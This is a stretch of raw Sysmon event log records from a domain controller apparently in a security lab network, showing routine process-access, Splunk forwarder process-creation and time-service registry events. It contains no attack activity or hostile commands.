13:16:19.025{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.025{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.025{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.025{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.025{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.025{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4423-6000-1001-000000009A01}4296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.025{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4423-6000-1001-000000009A01}4296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.027{08A6967A-4423-6000-1001-000000009A01}4296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4424-6000-1101-000000009A01}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4424-6000-1101-000000009A01}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.166{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4424-6000-1101-000000009A01}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:20.168{08A6967A-4424-6000-1101-000000009A01}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000004850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:16:44.657{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea77-0x81601929) 10341000x80000000000000004877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.930{08A6967A-445B-6000-1301-000000009A01}46163412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.789{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-445B-6000-1301-000000009A01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.789{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.789{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.789{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 